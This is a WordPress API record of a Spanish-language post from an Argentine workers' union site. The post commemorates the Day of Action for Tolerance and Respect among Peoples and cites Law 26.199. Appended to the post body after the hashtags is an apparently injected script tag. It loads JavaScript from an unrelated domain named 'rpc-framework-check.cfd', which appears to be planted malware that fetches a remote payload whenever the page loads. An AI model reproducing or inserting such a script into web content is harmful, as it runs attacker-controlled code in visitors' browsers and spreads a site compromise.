{"id":18394,"date":"2025-04-24T14:32:16","date_gmt":"2025-04-24T17:32:16","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18394"},"modified":"2026-02-02T17:13:58","modified_gmt":"2026-02-02T20:13:58","slug":"dia-de-la-accion-por-la-tolerancia-y-el-respeto-entre-los-pueblos","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/04\/dia-de-la-accion-por-la-tolerancia-y-el-respeto-entre-los-pueblos\/","title":{"rendered":"D\u00eda de la Acci\u00f3n por la Tolerancia y el respeto entre los pueblos"},"content":{"rendered":"\n<p>\ud83d\udcc5Hoy, 24 de abril, se conmemora el D\u00eda de la Acci\u00f3n por la Tolerancia y el respeto entre los pueblos, una fecha para promover la comprensi\u00f3n, el respeto y la convivencia pac\u00edfica entre las diferentes culturas y pueblos del mundo.<\/p>\n\n\n\n<p>Esta fecha se celebra en Argentina desde el 2007, gracias a la promulgaci\u00f3n de la Ley 26.199. Busca fomentar la tolerancia y el respeto por la diversidad cultural, religiosa y \u00e9tnica. Promover la no violencia y la resoluci\u00f3n pac\u00edfica de conflictos.<\/p>\n\n\n\n<p>As\u00ed tambi\u00e9n, reconocer y valorar la riqueza de la diversidad cultural y su contribuci\u00f3n al desarrollo de las sociedades.\ud83e\udd1d<\/p>\n\n\n\n<p>#D\u00edaDeLaTolerancia #NoViolencia #DiversidadCultural<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83d\udcc5Hoy, 24 de abril, se conmemora el D\u00eda de la Acci\u00f3n por la Tolerancia y&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18395,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-18394","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18394","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18394"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18394\/revisions"}],"predecessor-version":[{"id":20832,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18394\/revisions\/20832"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18395"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18394"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18394"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18394"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}